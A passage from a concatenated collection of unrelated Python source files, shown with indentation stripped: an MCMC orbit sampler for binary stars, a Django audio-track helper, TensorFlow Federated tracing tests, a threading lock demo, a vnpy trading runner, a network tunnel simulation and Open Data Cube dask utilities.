be generalized to **args.
'''
# info("brain")
fname, arg = self.conn.recv() # Waits here to receive a new message
if args.debug:
self.logger.debug("{} received message {}".format(os.getpid(), (fname, arg)))
func = self.func_dict.get(fname, False)
if func:
response = func(arg)
else:
if args.debug:
self.logger.info("Given an unknown function {}, assuming kill signal.".format(fname))
return False
# Functions only return a response other than None when they want them
# communicated back to the master process.
# Some commands sent to the child processes do not require a response
# to the main process.
if response:
if args.debug:
self.logger.debug("{} sending back {}".format(os.getpid(), response))
self.conn.send(response)
return True
# Moving forward, we have the option to subclass Worker if we want to alter routines.
# We create one Order() in the main process. When the process forks, each
# subprocess now has its own independent OrderModel instance.
# Then, each forked model will be customized using an INIT command passed
# through the PIPE.
def initialize(worker):
# Fork a subprocess for each key: (spectra, order)
pconns = {} # Parent connections
cconns = {} # Child connections
ps = {} # Process objects
# Create all of the pipes
for key in chunk_keys:
pconn, cconn = Pipe()
pconns[key], cconns[key] = pconn, cconn
p = Process(target=worker.brain, args=(cconn,))
p.start()
ps[key] = p
# print("created keys", chunk_keys)
# print("conns", pconns, cconns)
# initialize each Model to a specific chunk
for key, pconn in pconns.items():
pconn.send(("INIT", key))
return (pconns, cconns, ps)
def profile_code():
'''
Test hook designed to be used by cprofile or kernprof. Does not include any
network latency from communicating or synchronizing between processes
because we run on just one process.
'''
#Evaluate one complete iteration from delivery of stellar parameters from master process
#Master proposal
# stellar_Starting.update({"logg":4.29})
# model.stellar_lnprob(stellar_Starting)
#Assume we accepted
# model.decide_stellar(True)
#Right now, assumes Kurucz order 23
pass
def test():
# Uncomment these lines to profile
# #Initialize the current model for profiling purposes
# model.initialize((0, 0))
# import cProfile
# cProfile.run("profile_code()", "prof")
# import sys; sys.exit()
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
# All subprocesses will inherit pipe file descriptors created in the master process.
# http://www.pushingbits.net/posts/python-multiprocessing-with-pipes/
# thus, to really close a pipe, you need to close it in every subprocess.
# Create the main sampling loop, which will sample the theta parameters across all chunks
worker = Worker(debug=True)
# Now that the different processes have been forked, initialize them
pconns, cconns, ps = initialize(worker)
def prior_SB1(p):
(K, e, omega, P, T0, gamma), (amp_f, l_f) = convert_vector_p(p)
if K < 0.0 or e < 0.0 or e > 1.0 or P < 0.0 or omega < -90 or omega > 450 or amp_f < 0.0 or l_f < 0.0:
return -np.inf
else:
return 0.0
def prior_SB2(p):
(q, K, e, omega, P, T0, gamma), (amp_f, l_f, amp_g, l_g) = convert_vector_p(p)
if q < 0.0 or K < 0.0 or e < 0.0 or e > 1.0 or P < 0.0 or omega < -90 or omega > 450 or amp_f < 0.0 or l_f < 0.0 or amp_g < 0.0 or l_g < 0.0:
return -np.inf
else:
return 0.0
def prior_ST3(p):
(q_in, K_in, e_in, omega_in, P_in, T0_in, q_out, K_out, e_out, omega_out, P_out, T0_out, gamma), (amp_f, l_f, amp_g, l_g, amp_h, l_h) = convert_vector_p(p)
if q_in < 0.0 or K_in < 0.0 or e_in < 0.0 or e_in > 1.0 or P_in < 0.0 or omega_in < -90 or omega_in > 450 or q_out < 0.0 or K_out < 0.0 or e_out < 0.0 or e_out > 1.0 or P_out < 0.0 or omega_out < -90 or omega_out > 450 or amp_f < 0.0 or l_f < 0.0 or amp_g < 0.0 or l_g < 0.0 or amp_h < 0.0 or l_h < 0.0:
return -np.inf
else:
return 0.0
# Optionally load a user-defined prior.
# Check if a file named "prior.py" exists in the local folder
# If so, import it
try:
from prior import prior
print("Loaded user defined prior.")
except ImportError:
print("Using default prior.")
# Set the default priors.
priors = {"SB1":prior_SB1, "SB2":prior_SB2, "ST3":prior_ST3}
prior = priors[model]
def lnprob(p):
lnprior = prior(p)
if lnprior == -np.inf:
return -np.inf
#Distribute the calculation, one chunk to each process
for (key, pconn) in pconns.items():
pconn.send(("LNPROB", p))
#Collect the answer from each process
lnps = np.empty(n_chunks)
for i, pconn in enumerate(pconns.values()):
lnps[i] = pconn.recv()
# Calculate the summed lnprob
s = np.sum(lnps)
# Add any the prior to the total
return s + lnprior
print("Defined lnprob")
# Import the Metropolis-hastings sampler to do the sampling in the top level parameters
from emcee import MHSampler
print("Imported emcee")
# Determine how many parameters we will actually be fitting
# The difference between all of the parameters and the parameters we will be fixing
dim = len(utils.registered_params[model]) - len(config["fix_params"])
# Read in starting parameters
p0 = utils.convert_dict(model, config["fix_params"], **pars)
# To check feasibility, evaluate the starting position. If this evaluates to -np.inf, then just
# exit, since we might be wasting our time evaluating the rest.
print("Trying first evaluation")
lnp0 = lnprob(p0)
if lnp0 == -np.inf:
print("Starting position for Markov Chain evaluates to -np.inf")
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
raise RuntimeError
else:
print("Starting position good. lnp: {}".format(lnp0))
try:
cov = np.load(config["opt_jump"])
print("using optimal jumps")
except:
print("using hand-specified jumps")
cov = utils.convert_dict(model, config["fix_params"], **config["jumps"])**2 * np.eye(dim)
sampler = MHSampler(cov, dim, lnprob)
for i, result in enumerate(sampler.sample(p0, iterations=config["samples"])):
if (i+1) % 20 == 0:
print("Iteration", i +1)
# Save the actual chain of samples
print("Acceptance fraction", sampler.acceptance_fraction)
np.save(routdir + "lnprob.npy", sampler.lnprobability)
np.save(routdir + "flatchain.npy", sampler.flatchain)
# Kill all of the orders
for pconn in pconns.values():
pconn.send(("FINISH", None))
pconn.send(("DIE", None))
# Join on everything and terminate
for p in ps.values():
p.join()
p.terminate()
import sys;sys.exit()
|
files.py
|
from django.apps import apps
from django.core.exceptions import ObjectDoesNotExist
from django.core.files.base import ContentFile, File
from io import BytesIO, StringIO
import os
from pydub import AudioSegment
import threading
Song = apps.get_model('content', 'Song')
Track = apps.get_model('content', 'Track')
Variable = apps.get_model('administration', 'Variable')
def _start_processing(song: Song):
"""
"""
from content.tasks import convert_track_task
use_celery_processing = Variable.objects.retrieve('audio-processing-use-celery', False, output_type=bool)
if use_celery_processing:
convert_track_task.s(str(song.id)) \
.set(countdown=10) \
.delay()
else:
t = threading.Thread(target=convert_track_task, args=[song])
t.setDaemon(True)
t.start()
def add_track_to_song(song: Song, track: File=None, editing: bool=False, admin_edit: bool=False):
# assert argument types
if not isinstance(song, Song): raise TypeError("Parameter 'song' must be a Song object")
if track and not isinstance(track, File): raise TypeError(f"Parameter 'track' must be a TemporaryUploadedFile object. Type: {type(track)}")
# skip everything if there is no track
if (not track) and (not admin_edit):
raise ValueError("Must include a track object if not editing")
if editing or admin_edit:
# delete all existing tracks
# if reprocessing from admin, only delete processed tracks
tracks = song.tracks.all() if editing else song.tracks.filter(is_original=False)
tracks.delete()
if isinstance(track, str):
new_track = Track.objects.create(reference=track, is_original=True, song=song)
return new_track
elif isinstance(track, dict):
new_track = Track.objects.create(refernce=track['track'], is_original=True, song=song)
return new_track
else: # it's a file
if not admin_edit:
track_obj = Track.objects.create(file=track, is_original=True, song=song)
else:
# get the original track from the song
track_obj = song.tracks.first()
# raise an exception if there is no track
if track_obj == None: raise ObjectDoesNotExist("Could not find a Track instance")
_start_processing(song)
return track
|
tracing_test.py
|
# Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import functools
import io
import logging as std_logging
import threading
import time
from absl import logging
from absl.testing import absltest
from tensorflow_federated.python.common_libs import tracing
# Traces may not run in _exactly_ one second, but we can assert it was at least
# one second; and most importantly the time should be logged.
ELAPSED_ONE_REGEX = r'Elapsed time [1-9][0-9]*\.[0-9]+'
class DebugLoggingTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.log = io.StringIO()
self.handler = std_logging.StreamHandler(self.log)
std_logging.root.addHandler(self.handler)
def tearDown(self):
std_logging.root.removeHandler(self.handler)
self.handler.close()
super().tearDown()
def _test_debug_logging_with_async_function(self, async_fn, test_regex, *args,
**kwargs):
loop = asyncio.get_event_loop()
try:
logging.set_verbosity(1)
retval = loop.run_until_complete(async_fn(*args, **kwargs))
finally:
logging.set_verbosity(0)
self.assertRegexMatch(''.join(self.log.getvalue()), [test_regex])
self.log.truncate(0)
loop.run_until_complete(async_fn(*args, **kwargs))
self.assertEmpty(''.join(self.log.getvalue()))
return retval
def _test_debug_logging_with_sync_function(self, sync_fn, test_regex, *args,
**kwargs):
try:
logging.set_verbosity(1)
retval = sync_fn(*args, **kwargs)
finally:
logging.set_verbosity(0)
self.assertRegexMatch(''.join(self.log.getvalue()), [test_regex])
self.log.truncate(0)
self.assertEmpty(''.join(self.log.getvalue()))
return retval
def test_logging_enter_exit(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(
foo, '.*Entering .*foo.*\n.*Exiting .*foo.*')
def test_logging_timing_captured(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(foo, 'Elapsed time')
def test_logging_timing_captures_value_around_async_call(self):
@tracing.trace
async def foo():
return await asyncio.sleep(1)
self._test_debug_logging_with_async_function(
foo, r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX)
def test_logging_non_blocking_function(self):
@tracing.trace(span=True)
async def foo():
return await asyncio.gather(
asyncio.sleep(1), asyncio.sleep(1), asyncio.sleep(1))
self._test_debug_logging_with_async_function(
foo, r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX)
def test_logging_non_blocking_method(self):
class AClass(absltest.TestCase):
@tracing.trace(span=True)
async def async_method(self, foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
await asyncio.sleep(1)
return 3
a_class = AClass()
result = self._test_debug_logging_with_async_function(
a_class.async_method,
# Non-blocking may not run exactly one second, but we can assert it was
# at least one second; and most importantly it should be logged.
r'AClass\.async_method\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
def test_logging_blocking_method(self):
class AClass(absltest.TestCase):
@tracing.trace(span=True)
def sync_method(self, foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
# Sleep for 1s is used to test that we measured runtime correctly
time.sleep(1)
return 3
a_class = AClass()
result = self._test_debug_logging_with_sync_function(
a_class.sync_method,
r'AClass\.sync_method\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
def test_logging_blocking_function(self):
@tracing.trace(span=True)
def foo(foo_arg, bar_arg, arg3=None, arg4=None):
self.assertEqual('foo', foo_arg)
self.assertEqual('bar', bar_arg)
self.assertIsNotNone(arg3)
self.assertIsNotNone(arg4)
# Sleep for 1s is used to test that we measured runtime correctly
time.sleep(1)
return 3
result = self._test_debug_logging_with_sync_function(
foo,
r'<locals>\.foo\. ' + ELAPSED_ONE_REGEX,
'foo',
'bar',
arg3='baz',
arg4=True)
self.assertEqual(3, result)
class MockTracingProvider(tracing.TracingProvider):
def __init__(self):
self.scopes = []
self.sub_scopes = []
self.nonces = []
self.parent_span_yields = []
self.fn_argss = []
self.fn_kwargss = []
self.trace_optss = []
self.trace_results = []
def span(self, scope, sub_scope, nonce, parent_span_yield, fn_args, fn_kwargs,
trace_opts):
self.scopes.append(scope)
self.sub_scopes.append(sub_scope)
self.nonces.append(nonce)
self.parent_span_yields.append(parent_span_yield)
self.fn_argss.append(fn_args)
self.fn_kwargss.append(fn_kwargs)
self.trace_optss.append(trace_opts)
if parent_span_yield is None:
new_yield = 0
else:
new_yield = parent_span_yield + 1
result = yield new_yield
self.trace_results.append(result)
def set_mock_trace() -> MockTracingProvider:
mock = MockTracingProvider()
tracing.set_tracing_providers([mock])
return mock
class TracingProviderInterfaceTest(absltest.TestCase):
def test_basic_span(self):
mock = set_mock_trace()
with tracing.span('scope', 'sub_scope', options='some_option'):
pass
self.assertEqual(mock.scopes[0], 'scope')
self.assertEqual(mock.sub_scopes[0], 'sub_scope')
self.assertEqual(mock.parent_span_yields[0], None)
self.assertEqual(mock.fn_argss[0], None)
self.assertEqual(mock.fn_kwargss[0], None)
self.assertEqual(mock.trace_optss[0], {'options': 'some_option'})
self.assertIsInstance(mock.trace_results[0], tracing.TracedSpan)
def test_sibling_spans(self):
mock = set_mock_trace()
with tracing.span('parent', ''):
with tracing.span('child1', ''):
pass
with tracing.span('child2', ''):
pass
with tracing.span('parentless', ''):
pass
self.assertEqual(mock.scopes, ['parent', 'child1', 'child2', 'parentless'])
self.assertEqual(mock.parent_span_yields, [None, 0, 0, None])
def test_nested_non_async_span(self):
mock = set_mock_trace()
with tracing.span('outer', 'osub'):
with tracing.span('middle', 'msub'):
with tracing.span('inner', 'isub'):
pass
self.assertEqual(mock.scopes, ['outer', 'middle', 'inner'])
self.assertEqual(mock.sub_scopes, ['osub', 'msub', 'isub'])
self.assertEqual(mock.parent_span_yields, [None, 0, 1])
def test_basic_trace(self):
mock = set_mock_trace()
class MyClass:
@tracing.trace(options='some_option')
def my_func(a, b, kw=None): # pylint: disable=no-self-argument
del a, b, kw
return 5
MyClass.my_func(1, 2, kw=3)
self.assertEqual(mock.scopes[0], 'MyClass')
self.assertEqual(mock.sub_scopes[0], 'my_func')
self.assertEqual(mock.parent_span_yields[0], None)
self.assertEqual(mock.fn_argss[0], (1, 2))
self.assertEqual(mock.fn_kwargss[0], {'kw': 3})
self.assertEqual(mock.trace_optss[0], {'options': 'some_option'})
self.assertIsInstance(mock.trace_results[0], tracing.TracedFunctionReturned)
self.assertEqual(mock.trace_results[0].value, 5)
def test_trace_throws(self):
mock = set_mock_trace()
class MyClass:
@tracing.trace
def my_func(): # pylint: disable=no-method-argument
raise ValueError(5)
try:
MyClass.my_func()
raise AssertionError('should have thrown')
except ValueError:
pass
self.assertIsInstance(mock.trace_results[0], tracing.TracedFunctionThrew)
self.assertEqual(mock.trace_results[0].error_type, ValueError)
self.assertIsInstance(mock.trace_results[0].error_value, ValueError)
def test_parenting_non_async_to_async_to_nested_async(self):
mock = set_mock_trace()
loop = asyncio.new_event_loop()
loop.set_task_factory(tracing.propagate_trace_context_task_factory)
def run_loop():
loop.run_forever()
loop.close()
thread = threading.Thread(target=functools.partial(run_loop), daemon=True)
thread.start()
@tracing.trace
async def middle():
with tracing.span('inner', ''):
pass
with tracing.span('outer', ''):
# This sends the coroutine over to another thread,
# keeping the current trace context.
coro_with_trace_ctx = tracing.wrap_coroutine_in_current_trace_context(
middle())
asyncio.run_coroutine_threadsafe(coro_with_trace_ctx, loop).result()
loop.call_soon_threadsafe(loop.stop)
thread.join()
self.assertEqual(mock.parent_span_yields, [None, 0, 1])
self.assertEqual(mock.scopes, ['outer', '<locals>', 'inner'])
self.assertEqual(mock.sub_scopes, ['', 'middle', ''])
if __name__ == '__main__':
absltest.main()
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
with transfer_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
runCtaTrading.py
|
# encoding: UTF-8
import multiprocessing
from time import sleep
from datetime import datetime, time
from vnpy.event import EventEngine2
from vnpy.trader.vtEvent import EVENT_LOG
from vnpy.trader.vtEngine import MainEngine, LogEngine
from vnpy.trader.gateway import ctpGateway
from vnpy.trader.app import ctaStrategy
from vnpy.trader.app.ctaStrategy.ctaBase import EVENT_CTA_LOG
#----------------------------------------------------------------------
def runChildProcess():
"""子进程运行函数"""
print '-'*20
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.addFileHandler()
le.info(u'启动CTA策略运行子进程')
ee = EventEngine2()
le.info(u'事件引擎创建成功')
me = MainEngine(ee)
me.addGateway(ctpGateway)
me.addApp(ctaStrategy)
le.info(u'主引擎创建成功')
ee.register(EVENT_LOG, le.processLogEvent)
ee.register(EVENT_CTA_LOG, le.processLogEvent)
le.info(u'注册日志事件监听')
me.connect('CTP')
le.info(u'连接CTP接口')
sleep(5) # 等待CTP接口初始化
cta = me.getApp(ctaStrategy.appName)
cta.loadSetting()
le.info(u'CTA策略载入成功')
cta.initAll()
le.info(u'CTA策略初始化成功')
cta.startAll()
le.info(u'CTA策略启动成功')
while True:
sleep(1)
#----------------------------------------------------------------------
def runParentProcess():
"""父进程运行函数"""
# 创建日志引擎
le = LogEngine()
le.setLogLevel(le.LEVEL_INFO)
le.addConsoleHandler()
le.info(u'启动CTA策略守护父进程')
DAY_START = time(8, 45) # 日盘启动和停止时间
DAY_END = time(15, 30)
NIGHT_START = time(20, 45) # 夜盘启动和停止时间
NIGHT_END = time(2, 45)
p = None # 子进程句柄
while True:
currentTime = datetime.now().time()
recording = False
# 判断当前处于的时间段
if ((currentTime >= DAY_START and currentTime <= DAY_END) or
(currentTime >= NIGHT_START) or
(currentTime <= NIGHT_END)):
recording = True
# 记录时间则需要启动子进程
if recording and p is None:
le.info(u'启动子进程')
p = multiprocessing.Process(target=runChildProcess)
p.start()
le.info(u'子进程启动成功')
# 非记录时间则退出子进程
if not recording and p is not None:
le.info(u'关闭子进程')
p.terminate()
p.join()
p = None
le.info(u'子进程关闭成功')
sleep(5)
if __name__ == '__main__':
runChildProcess()
# 尽管同样实现了无人值守,但强烈建议每天启动时人工检查,为自己的PNL负责
#runParentProcess()
|
main.py
|
#!/usr/bin/env python
# Copyright (c) PLUMgrid, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from builtins import input
from http.server import HTTPServer, SimpleHTTPRequestHandler
from netaddr import IPNetwork
from os import chdir
from pyroute2 import IPRoute, NetNS, IPDB, NSPopen
from random import choice, randint
from simulation import Simulation
from socket import htons
from threading import Thread
import sys
ipr = IPRoute()
ipdb = IPDB(nl=ipr)
num_hosts = 9
num_vnis = 4
null = open("/dev/null", "w")
class TunnelSimulation(Simulation):
def __init__(self, ipdb):
super(TunnelSimulation, self).__init__(ipdb)
self.available_ips = [list(IPNetwork("192.168.%d.0/24" % i)[1:-1])
for i in range(0, num_vnis)]
def start(self):
# each entry is tuple of ns_ipdb, out_ifc, in_ifc
host_info = []
for i in range(0, num_hosts):
print("Launching host %i of %i" % (i + 1, num_hosts))
ipaddr = "172.16.1.%d/24" % (100 + i)
host_info.append(self._create_ns("host%d" % i, ipaddr=ipaddr))
with self.ipdb.create(ifname="br100", kind="bridge") as br100:
for host in host_info: br100.add_port(host[1])
br100.up()
# create a vxlan device inside each namespace
for host in host_info:
print("Starting tunnel %i of %i" % (len(self.processes) + 1, num_hosts))
cmd = ["netserver", "-D"]
self.processes.append(NSPopen(host[0].nl.netns, cmd, stdout=null))
for i in range(0, num_vnis):
with host[0].create(ifname="vxlan%d" % i, kind="vxlan",
vxlan_id=10000 + i,
vxlan_link=host[0].interfaces.eth0,
vxlan_port=htons(4789),
vxlan_group="239.1.1.%d" % (1 + i)) as vx:
vx.up()
with host[0].create(ifname="br%d" % i, kind="bridge") as br:
br.add_port(host[0].interfaces["vxlan%d" % i])
br.up()
with host[0].create(ifname="c%da" % i, kind="veth",
peer="c%db" % i) as c:
c.up()
c.add_ip("%s/24" % self.available_ips[i].pop(0))
c.mtu = 1450
br.add_port(host[0].interfaces["c%db" % i])
host[0].interfaces["c%db" % i].up().commit()
# pick one host to start the monitor in
host = host_info[0]
cmd = ["python", "monitor.py"]
p = NSPopen(host[0].nl.netns, cmd)
self.processes.append(p)
def serve_http(self):
chdir("chord-transitions")
# comment below line to see http server log messages
SimpleHTTPRequestHandler.log_message = lambda self, format, *args: None
self.srv = HTTPServer(("", 8080), SimpleHTTPRequestHandler)
self.t = Thread(target=self.srv.serve_forever)
self.t.setDaemon(True)
self.t.start()
print("HTTPServer listening on 0.0.0.0:8080")
try:
sim = TunnelSimulation(ipdb)
sim.start()
sim.serve_http()
input("Press enter to quit:")
finally:
if "br100" in ipdb.interfaces: ipdb.interfaces.br100.remove().commit()
sim.release()
ipdb.release()
null.close()
|
dask.py
|
# This file is part of the Open Data Cube, see https://opendatacube.org for more information
#
# Copyright (c) 2015-2020 ODC Contributors
# SPDX-License-Identifier: Apache-2.0
""" Dask Distributed Tools
"""
from typing import Any, Iterable, Optional, Union, Tuple
from random import randint
import toolz
import queue
from dask.distributed import Client
import dask
import threading
import logging
import os
__all__ = (
"start_local_dask",
"pmap",
"compute_tasks",
"partition_map",
"save_blob_to_file",
"save_blob_to_s3",
)
_LOG = logging.getLogger(__name__)
def get_total_available_memory(check_jupyter_hub=True):
""" Figure out how much memory is available
1. Check MEM_LIMIT environment variable, set by jupyterhub
2. Use hardware information if that not set
"""
if check_jupyter_hub:
mem_limit = os.environ.get('MEM_LIMIT', None)
if mem_limit is not None:
return int(mem_limit)
from psutil import virtual_memory
return virtual_memory().total
def compute_memory_per_worker(n_workers: int = 1,
mem_safety_margin: Optional[Union[str, int]] = None,
memory_limit: Optional[Union[str, int]] = None) -> int:
""" Figure out how much memory to assign per worker.
result can be passed into ``memory_limit=`` parameter of dask worker/cluster/client
"""
from dask.utils import parse_bytes
if isinstance(memory_limit, str):
memory_limit = parse_bytes(memory_limit)
if isinstance(mem_safety_margin, str):
mem_safety_margin = parse_bytes(mem_safety_margin)
if memory_limit is None and mem_safety_margin is None:
total_bytes = get_total_available_memory()
# leave 500Mb or half of all memory if RAM is less than 1 Gb
mem_safety_margin = min(500*(1024*1024), total_bytes//2)
elif memory_limit is None:
total_bytes = get_total_available_memory()
elif mem_safety_margin is None:
total_bytes = memory_limit
mem_safety_margin = 0
else:
total_bytes = memory_limit
return (total_bytes - mem_safety_margin)//n_workers
def start_local_dask(n_workers: int = 1,
threads_per_worker: Optional[int] = None,
mem_safety_margin: Optional[Union[str, int]] = None,
memory_limit: Optional[Union[str, int]] = None,
**kw):
"""
Wrapper around ``distributed.Client(..)`` constructor that deals with memory better.
It also configures ``distributed.dashboard.link`` to go over proxy when operating
from behind jupyterhub.
:param n_workers: number of worker processes to launch
:param threads_per_worker: number of threads per worker, default is as many as there are CPUs
:param memory_limit: maximum memory to use across all workers
:param mem_safety_margin: bytes to reserve for the rest of the system, only applicable
if ``memory_limit=`` is not supplied.
.. note::
if ``memory_limit=`` is supplied, it will be parsed and divided equally between workers.
"""
# if dashboard.link set to default value and running behind hub, make dashboard link go via proxy
if dask.config.get("distributed.dashboard.link") == '{scheme}://{host}:{port}/status':
jup_prefix = os.environ.get('JUPYTERHUB_SERVICE_PREFIX')
if jup_prefix is not None:
jup_prefix = jup_prefix.rstrip('/')
dask.config.set({"distributed.dashboard.link": f"{jup_prefix}/proxy/{{port}}/status"})
memory_limit = compute_memory_per_worker(n_workers=n_workers,
memory_limit=memory_limit,
mem_safety_margin=mem_safety_margin)
client = Client(n_workers=n_workers,
threads_per_worker=threads_per_worker,
memory_limit=memory_limit,
**kw)
return client
def _randomize(prefix):
return '{}-{:08x}'.format(prefix, randint(0, 0xFFFFFFFF))
def partition_map(n: int, func: Any, its: Iterable[Any],
name: str = 'compute') -> Iterable[Any]:
"""
Parallel map in lumps.
Partition sequence into lumps of size ``n``, then construct dask delayed computation evaluating to:
.. code-block:: python
[func(x) for x in its[0:1n]],
[func(x) for x in its[n:2n]],
...
[func(x) for x in its[..]],
This is useful when you need to process a large number of small (quick) tasks (pixel drill for example).
:param n: number of elements to process in one go
:param func: Function to apply (non-dask)
:param its: Values to feed to fun
:param name: How the computation should be named in dask visualizations
Returns
-------
Iterator of ``dask.Delayed`` objects.
"""
def lump_proc(dd):
return [func(d) for d in dd]
proc = dask.delayed(lump_proc, nout=1, pure=True)
data_name = _randomize('data_' + name)
name = _randomize(name)
for i, dd in enumerate(toolz.partition_all(n, its)):
lump = dask.delayed(dd,
pure=True,
traverse=False,
name=data_name + str(i))
yield proc(lump, dask_key_name=name + str(i))
def compute_tasks(tasks: Iterable[Any], client: Client,
max_in_flight: int = 3) -> Iterable[Any]:
""" Parallel compute stream with back pressure.
Equivalent to:
.. code-block:: python
(client.compute(task).result()
for task in tasks)
but with up to ``max_in_flight`` tasks being processed at the same time.
Input/Output order is preserved, so there is a possibility of head of
line blocking.
.. note::
lower limit is 3 concurrent tasks to simplify implementation,
there is no point calling this function if you want one active
task and supporting exactly 2 active tasks is not worth the complexity,
for now. We might special-case 2 at some point.
"""
# New thread:
# 1. Take dask task from iterator
# 2. Submit to client for processing
# 3. Send it of to wrk_q
#
# Calling thread:
# 1. Pull scheduled future from wrk_q
# 2. Wait for result of the future
# 3. yield result to calling code
from .generic import it2q, qmap
# (max_in_flight - 2) -- one on each side of queue
wrk_q = queue.Queue(maxsize=max(1, max_in_flight - 2)) # type: queue.Queue
# fifo_timeout='0ms' ensures that priority of later tasks is lower
futures = (client.compute(task, fifo_timeout='0ms') for task in tasks)
in_thread = threading.Thread(target=it2q, args=(futures, wrk_q))
in_thread.start()
yield from qmap(lambda f: f.result(), wrk_q)
in_thread.join()
def pmap(func: Any,
its: Iterable[Any],
client: Client,
lump: int = 1,
max_in_flight: int = 3,
name: str = 'compute') -> Iterable[Any]:
""" Parallel map with back pressure.
Equivalent to this:
.. code-block:: python
(func(x) for x in its)
Except that ``func(x)`` runs concurrently on dask cluster.
:param func: Method that will be applied concurrently to data from ``its``
:param its: Iterator of input values
:param client: Connected dask client
:param lump: Group this many datasets into one task
:param max_in_flight: Maximum number of active tasks to submit
:param name: Dask name for computation
"""
max_in_flight = max_in_flight // lump
tasks = partition_map(lump, func, its, name=name)
for xx in compute_tasks(tasks, client=client, max_in_flight=max_in_flight):
yield from xx
def _save_blob_to_file(data: Union[bytes, str],
fname: str,
with_deps=None) -> Tuple[str, bool]:
if isinstance(data, str):
data = data.encode('utf8')
try:
with open(fname, 'wb') as f:
f.write(data)
except IOError:
return (fname, False)
return (fname, True)
def _save_blob_to_s3(data: Union[bytes, str],
url: str,
profile: Optional[str] = None,
creds = None,
region_name: Optional[str] = None,
with_deps=None,
**kw) -> Tuple[str, bool]:
from botocore.errorfactory import ClientError
from botocore.credentials import ReadOnlyCredentials
from botocore.exceptions import BotoCoreError
from .aws import s3_dump, s3_client
try:
s3 = s3_client(profile=profile,
creds=creds,
region_name=region_name,
cache=True)
result = s3_dump(data, url, s3=s3, **kw)
except (IOError, BotoCoreError, ClientError):
result = False
return url, result
_save_blob_to_file_delayed = dask.delayed(_save_blob_to_file, name='save-to-disk', pure=False)
_save_blob_to_s3_delayed = dask.delayed(_save_blob_to_s3, name='save-to-s3', pure=False)
def save_blob_to_file(data,
fname,
with_deps=None):
"""
Dump from memory to local filesystem as a dask delayed operation.
:param data: Data blob to save to file (have to fit into memory all at once),
strings will be saved in UTF8 format.
:param fname: Path to file
:param with_deps: Useful for introducing dependencies into dask graph,
for example save yaml file after saving all tiff files.
Returns
-------
``(FilePath, True)`` tuple on success
``(FilePath, False)`` on any error
.. note::
Dask workers must be local or have network filesystem mounted in
the same path as calling code.
"""
return _save_blob_to_file_delayed(data, fname, with_deps=with_deps)
def save_blob_to_s3(data,
url,
profile=None,
creds=None,
region_name=None,
with_deps=None,
**kw):
"""
Dump from memory to S3 as a dask delayed operation.
:param data: Data blob to save to file (have to fit into memory all at once)
:param url: Url in a form s3://bucket/path/to/file
:param profile: Profile name to lookup (only used if session is not supplied)
:param creds: Override credentials with supplied data
:param region_name: Region name to use, overrides session setting
:param with_deps: Useful for introducing dependencies into dask graph,
for example save yaml file after saving all tiff files.
:param kw: Passed on to ``s3.put_object(..)``, useful for things like ContentType/ACL
Returns
-------
``(url, True)`` tuple on success
``(url, False)`` on any error
"""
return _save_blob_to_s3_delayed(data, url,
